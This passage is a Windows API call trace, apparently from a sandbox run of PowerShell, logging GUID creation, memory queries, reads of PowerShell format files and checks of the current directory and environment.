	[0062.368] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x19d47d9f, Data2=0xbe2c, Data3=0x4548, Data4=([0]=0xb0, [1]=0xed, [2]=0xdc, [3]=0x8f, [4]=0x33, [5]=0x6b, [6]=0x35, [7]=0x88))) returned 0x0
	[0062.368] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x2a1cb444, Data2=0xd6c2, Data3=0x466b, Data4=([0]=0xb6, [1]=0x4f, [2]=0xa5, [3]=0xa5, [4]=0xdf, [5]=0xa, [6]=0x5, [7]=0x9a))) returned 0x0
	[0062.368] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x943a6b35, Data2=0x5541, Data3=0x4e68, Data4=([0]=0x98, [1]=0x32, [2]=0x1a, [3]=0x9f, [4]=0x1a, [5]=0xde, [6]=0x78, [7]=0x43))) returned 0x0
	[0062.368] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x7cbd3538, Data2=0xcd9f, Data3=0x4fb1, Data4=([0]=0xa5, [1]=0xed, [2]=0x78, [3]=0x5f, [4]=0x60, [5]=0x79, [6]=0xc9, [7]=0xd2))) returned 0x0
	[0062.368] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x26390085, Data2=0x3ead, Data3=0x48aa, Data4=([0]=0xb5, [1]=0x2e, [2]=0xb7, [3]=0x87, [4]=0x60, [5]=0xdc, [6]=0x18, [7]=0x8c))) returned 0x0
	[0062.369] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xc9a36bfc, Data2=0x6006, Data3=0x4024, Data4=([0]=0xbd, [1]=0x33, [2]=0xc8, [3]=0xde, [4]=0xe0, [5]=0xdb, [6]=0x3c, [7]=0xad))) returned 0x0
	[0062.369] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x5cabd778, Data2=0x42a0, Data3=0x4cb9, Data4=([0]=0xaf, [1]=0xc5, [2]=0x5, [3]=0x25, [4]=0x1f, [5]=0xf3, [6]=0x7d, [7]=0x73))) returned 0x0
	[0062.369] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x1427ca76, Data2=0x606e, Data3=0x46d6, Data4=([0]=0xa5, [1]=0x5f, [2]=0x2, [3]=0xec, [4]=0x8e, [5]=0xc6, [6]=0x30, [7]=0x16))) returned 0x0
	[0062.370] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x1cbfea65, Data2=0x2bf6, Data3=0x433d, Data4=([0]=0x8a, [1]=0x91, [2]=0xb4, [3]=0xed, [4]=0xee, [5]=0xb8, [6]=0xc7, [7]=0x3))) returned 0x0
	[0062.370] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.370] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.371] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.371] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.371] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xb6101539, Data2=0xc72b, Data3=0x4750, Data4=([0]=0x99, [1]=0x71, [2]=0x4b, [3]=0x2a, [4]=0x20, [5]=0x8c, [6]=0x18, [7]=0x33))) returned 0x0
	[0062.372] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x8c6396ca, Data2=0xb8ba, Data3=0x48e2, Data4=([0]=0xa3, [1]=0x2b, [2]=0x66, [3]=0x54, [4]=0x27, [5]=0x77, [6]=0x66, [7]=0xeb))) returned 0x0
	[0062.372] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xd279eb53, Data2=0x573f, Data3=0x4b6a, Data4=([0]=0xb9, [1]=0x1, [2]=0x69, [3]=0x98, [4]=0x3f, [5]=0x72, [6]=0xc2, [7]=0x86))) returned 0x0
	[0062.372] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xde66e75f, Data2=0x9609, Data3=0x4915, Data4=([0]=0xa4, [1]=0x45, [2]=0x9d, [3]=0x64, [4]=0x29, [5]=0x40, [6]=0x59, [7]=0x93))) returned 0x0
	[0062.372] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xa76429c0, Data2=0xbb55, Data3=0x4b3c, Data4=([0]=0x98, [1]=0x53, [2]=0xea, [3]=0x29, [4]=0x13, [5]=0xe, [6]=0x94, [7]=0xf5))) returned 0x0
	[0062.373] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xbb1a3e68, Data2=0x81a2, Data3=0x4248, Data4=([0]=0xac, [1]=0x82, [2]=0x12, [3]=0x1a, [4]=0x88, [5]=0x9e, [6]=0xbd, [7]=0x95))) returned 0x0
	[0062.373] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xd72bfeb, Data2=0x694e, Data3=0x4ca5, Data4=([0]=0x95, [1]=0x96, [2]=0x51, [3]=0xe8, [4]=0xb, [5]=0x3e, [6]=0xfa, [7]=0x99))) returned 0x0
	[0062.373] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x6ef2875a, Data2=0x4471, Data3=0x4be2, Data4=([0]=0xb1, [1]=0x81, [2]=0x6e, [3]=0xfb, [4]=0xa6, [5]=0x24, [6]=0xc, [7]=0xd4))) returned 0x0
	[0062.373] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xe5ba4b24, Data2=0x5e25, Data3=0x444c, Data4=([0]=0x8a, [1]=0x14, [2]=0x2b, [3]=0x68, [4]=0xdb, [5]=0xd6, [6]=0x16, [7]=0x1))) returned 0x0
	[0062.374] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x6c4e7cde, Data2=0x13c9, Data3=0x4930, Data4=([0]=0xa7, [1]=0x5b, [2]=0xcd, [3]=0xee, [4]=0x61, [5]=0x84, [6]=0x5d, [7]=0x3c))) returned 0x0
	[0062.374] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xb3eac7e2, Data2=0x91c1, Data3=0x4448, Data4=([0]=0xbd, [1]=0x3f, [2]=0x53, [3]=0xdc, [4]=0xc0, [5]=0xf3, [6]=0xa8, [7]=0x79))) returned 0x0
	[0062.374] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x1ba1bfe0, Data2=0x16a1, Data3=0x4fa8, Data4=([0]=0x9c, [1]=0xae, [2]=0x39, [3]=0x18, [4]=0xce, [5]=0x54, [6]=0x90, [7]=0x96))) returned 0x0
	[0062.374] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x422b49a8, Data2=0xb972, Data3=0x42de, Data4=([0]=0xa3, [1]=0xe3, [2]=0xc8, [3]=0xa4, [4]=0xa5, [5]=0x9c, [6]=0x4a, [7]=0xa1))) returned 0x0
	[0062.374] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.375] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xe5cee294, Data2=0x1e90, Data3=0x40cb, Data4=([0]=0xbc, [1]=0xe0, [2]=0xb3, [3]=0x24, [4]=0xb8, [5]=0xea, [6]=0x21, [7]=0xe3))) returned 0x0
	[0062.375] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.401] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.402] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x83712fbe, Data2=0x33be, Data3=0x4610, Data4=([0]=0x8e, [1]=0xe5, [2]=0x9, [3]=0xef, [4]=0x85, [5]=0xbf, [6]=0x9, [7]=0xc1))) returned 0x0
	[0062.402] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xbb7d6794, Data2=0xf7a3, Data3=0x4d6f, Data4=([0]=0xb0, [1]=0x8d, [2]=0x27, [3]=0x8, [4]=0x1a, [5]=0x8b, [6]=0x82, [7]=0xf7))) returned 0x0
	[0062.402] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x88f3ee5f, Data2=0x7ba5, Data3=0x4d04, Data4=([0]=0x90, [1]=0x5d, [2]=0x7e, [3]=0x89, [4]=0x2e, [5]=0x6e, [6]=0x66, [7]=0xc3))) returned 0x0
	[0062.402] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.403] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x1dfffb06, Data2=0x257, Data3=0x49e8, Data4=([0]=0x9c, [1]=0x69, [2]=0x23, [3]=0xc6, [4]=0x56, [5]=0x13, [6]=0x8c, [7]=0xce))) returned 0x0
	[0062.403] VirtualQuery (in: lpAddress=0x279440, lpBuffer=0x350027a300, dwLength=0x30 | out: lpBuffer=0x350027a300*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.403] VirtualQuery (in: lpAddress=0x278ff0, lpBuffer=0x3500279eb0, dwLength=0x30 | out: lpBuffer=0x3500279eb0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.403] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xf8054416, Data2=0xfea8, Data3=0x42a7, Data4=([0]=0xa3, [1]=0xb5, [2]=0x87, [3]=0x65, [4]=0xf0, [5]=0x3b, [6]=0x44, [7]=0x50))) returned 0x0
	[0062.403] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.403] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x16afcc29, Data2=0x423f, Data3=0x49c2, Data4=([0]=0x97, [1]=0x3a, [2]=0x46, [3]=0x76, [4]=0x43, [5]=0x95, [6]=0x7b, [7]=0xbc))) returned 0x0
	[0062.404] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xcecb49bd, Data2=0x8ea4, Data3=0x437f, Data4=([0]=0x8d, [1]=0x88, [2]=0x88, [3]=0xcd, [4]=0x17, [5]=0x8e, [6]=0x72, [7]=0xad))) returned 0x0
	[0062.404] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.404] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.404] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.404] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.405] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xce9e7a45, Data2=0x29cd, Data3=0x4ae7, Data4=([0]=0xb2, [1]=0xf0, [2]=0x95, [3]=0x35, [4]=0x18, [5]=0xf9, [6]=0x1, [7]=0x8d))) returned 0x0
	[0062.405] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xb41e49c, Data2=0x9353, Data3=0x46f1, Data4=([0]=0xb8, [1]=0x96, [2]=0x26, [3]=0xac, [4]=0xa3, [5]=0xe0, [6]=0x23, [7]=0xdd))) returned 0x0
	[0062.405] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xf7a767a3, Data2=0xfa29, Data3=0x49a8, Data4=([0]=0xa1, [1]=0xa5, [2]=0x36, [3]=0xb8, [4]=0x88, [5]=0x9b, [6]=0xe1, [7]=0x15))) returned 0x0
	[0062.405] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xeed6284, Data2=0xc937, Data3=0x4083, Data4=([0]=0xa7, [1]=0x7f, [2]=0x1e, [3]=0x8e, [4]=0xd9, [5]=0x22, [6]=0xb3, [7]=0xcd))) returned 0x0
	[0062.405] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xf2c0d9c3, Data2=0x4ea1, Data3=0x47f1, Data4=([0]=0xa7, [1]=0x4b, [2]=0xa7, [3]=0xb8, [4]=0x46, [5]=0xbf, [6]=0xdc, [7]=0xd))) returned 0x0
	[0062.405] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x36ff0e0e, Data2=0xe3e3, Data3=0x43b7, Data4=([0]=0xbf, [1]=0x37, [2]=0xfc, [3]=0x2b, [4]=0x30, [5]=0xcf, [6]=0x61, [7]=0x54))) returned 0x0
	[0062.406] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.406] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x96f92153, Data2=0x9f44, Data3=0x4d6f, Data4=([0]=0x91, [1]=0x7, [2]=0xf6, [3]=0x5e, [4]=0x3e, [5]=0x49, [6]=0x94, [7]=0xb0))) returned 0x0
	[0062.406] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x6c282836, Data2=0xbf9a, Data3=0x4fe4, Data4=([0]=0x99, [1]=0xb2, [2]=0x16, [3]=0x81, [4]=0x9e, [5]=0x91, [6]=0x1d, [7]=0xc))) returned 0x0
	[0062.406] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xa6751130, Data2=0x6cf9, Data3=0x4926, Data4=([0]=0x9a, [1]=0x89, [2]=0x8f, [3]=0x4, [4]=0x3a, [5]=0x52, [6]=0xde, [7]=0x96))) returned 0x0
	[0062.406] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xffe52099, Data2=0xaab0, Data3=0x41a9, Data4=([0]=0xb3, [1]=0xf1, [2]=0xed, [3]=0xf1, [4]=0x0, [5]=0x22, [6]=0xfb, [7]=0xd1))) returned 0x0
	[0062.407] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xce7a3dc3, Data2=0xdcc7, Data3=0x4807, Data4=([0]=0xbf, [1]=0xc2, [2]=0x52, [3]=0x6c, [4]=0x80, [5]=0x46, [6]=0x9d, [7]=0x1d))) returned 0x0
	[0062.407] VirtualQuery (in: lpAddress=0x279440, lpBuffer=0x350027a300, dwLength=0x30 | out: lpBuffer=0x350027a300*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.407] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.407] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x611d1c1b, Data2=0x3646, Data3=0x4e40, Data4=([0]=0xaf, [1]=0x92, [2]=0x4c, [3]=0x78, [4]=0xdd, [5]=0x7d, [6]=0x6a, [7]=0xf6))) returned 0x0
	[0062.407] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.408] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x83df4737, Data2=0x333, Data3=0x4bef, Data4=([0]=0xa1, [1]=0xa, [2]=0xbb, [3]=0x80, [4]=0x94, [5]=0xfa, [6]=0x79, [7]=0xdb))) returned 0x0
	[0062.408] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x6c34bd27, Data2=0x3400, Data3=0x4b6a, Data4=([0]=0xa9, [1]=0xbe, [2]=0xc8, [3]=0xd5, [4]=0x2e, [5]=0xca, [6]=0x8a, [7]=0xe3))) returned 0x0
	[0062.408] VirtualQuery (in: lpAddress=0x2791f0, lpBuffer=0x350027a0b0, dwLength=0x30 | out: lpBuffer=0x350027a0b0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.408] VirtualQuery (in: lpAddress=0x2791f0, lpBuffer=0x350027a0b0, dwLength=0x30 | out: lpBuffer=0x350027a0b0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.408] VirtualQuery (in: lpAddress=0x2791f0, lpBuffer=0x350027a0b0, dwLength=0x30 | out: lpBuffer=0x350027a0b0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.408] VirtualQuery (in: lpAddress=0x2791f0, lpBuffer=0x350027a0b0, dwLength=0x30 | out: lpBuffer=0x350027a0b0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.409] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xeb1bf923, Data2=0x6978, Data3=0x4514, Data4=([0]=0xa5, [1]=0xc3, [2]=0x46, [3]=0x9b, [4]=0x9a, [5]=0xd9, [6]=0x88, [7]=0xb8))) returned 0x0
	[0062.409] VirtualQuery (in: lpAddress=0x2791f0, lpBuffer=0x350027a0b0, dwLength=0x30 | out: lpBuffer=0x350027a0b0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.409] VirtualQuery (in: lpAddress=0x2791f0, lpBuffer=0x350027a0b0, dwLength=0x30 | out: lpBuffer=0x350027a0b0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.409] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xb358b316, Data2=0x1914, Data3=0x41bb, Data4=([0]=0xb5, [1]=0x3c, [2]=0xf0, [3]=0x91, [4]=0x60, [5]=0x50, [6]=0xd9, [7]=0xf))) returned 0x0
	[0062.409] VirtualQuery (in: lpAddress=0x2791f0, lpBuffer=0x350027a0b0, dwLength=0x30 | out: lpBuffer=0x350027a0b0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.410] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x669e12c0, Data2=0xa30f, Data3=0x4e0b, Data4=([0]=0x98, [1]=0xf8, [2]=0x75, [3]=0xcf, [4]=0xa7, [5]=0xa0, [6]=0x60, [7]=0xd4))) returned 0x0
	[0062.410] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x75dba459, Data2=0x9d4d, Data3=0x486f, Data4=([0]=0x99, [1]=0x37, [2]=0xb8, [3]=0x40, [4]=0xa7, [5]=0x23, [6]=0x90, [7]=0x40))) returned 0x0
	[0062.410] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.410] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x690
	[0062.410] GetFileType (hFile=0x690) returned 0x1
	[0062.410] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.411] GetFileType (hFile=0x690) returned 0x1
	[0062.411] ReadFile (in: hFile=0x690, lpBuffer=0x233e43a71b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e43a71b0*, lpNumberOfBytesRead=0x350027a518*=0x1000, lpOverlapped=0x0) returned 1
	[0062.412] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x244c6c33, Data2=0xf679, Data3=0x4db5, Data4=([0]=0x96, [1]=0xaa, [2]=0xa1, [3]=0xb, [4]=0x3b, [5]=0x1c, [6]=0x1f, [7]=0x40))) returned 0x0
	[0062.412] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x80ca6745, Data2=0xe1f9, Data3=0x4412, Data4=([0]=0x9c, [1]=0xc7, [2]=0x88, [3]=0xb3, [4]=0x5c, [5]=0x2d, [6]=0x10, [7]=0x54))) returned 0x0
	[0062.412] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.412] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x690
	[0062.413] GetFileType (hFile=0x690) returned 0x1
	[0062.413] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.413] GetFileType (hFile=0x690) returned 0x1
	[0062.413] ReadFile (in: hFile=0x690, lpBuffer=0x233e43be850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e43be850*, lpNumberOfBytesRead=0x350027a518*=0x1000, lpOverlapped=0x0) returned 1
	[0062.414] VirtualQuery (in: lpAddress=0x279040, lpBuffer=0x3500279f00, dwLength=0x30 | out: lpBuffer=0x3500279f00*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.415] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x3665f3cf, Data2=0x9e66, Data3=0x4431, Data4=([0]=0xba, [1]=0xae, [2]=0x3b, [3]=0x3, [4]=0x2, [5]=0x53, [6]=0x3a, [7]=0x6))) returned 0x0
	[0062.415] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.420] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8410
	[0062.420] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.420] CoTaskMemFree (pv=0x233e39e8410) 
	[0062.421] CoTaskMemAlloc (cb=0x20e) returned 0x233e39faa20
	[0062.421] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x233e39faa20 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19
	[0062.421] CoTaskMemFree (pv=0x233e39faa20) 
	[0062.422] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8fc0
	[0062.422] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8fc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.422] CoTaskMemFree (pv=0x233e39e8fc0) 
	[0062.422] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9620
	[0062.422] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.422] CoTaskMemFree (pv=0x233e39e9620) 
	[0062.429] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8da0
	[0062.429] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.429] CoTaskMemFree (pv=0x233e39e8da0) 
	[0062.430] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8850
	[0062.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8850, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.430] CoTaskMemFree (pv=0x233e39e8850) 
	[0062.430] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0x350027a340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0062.431] SetErrorMode (uMode=0x1) returned 0x8001
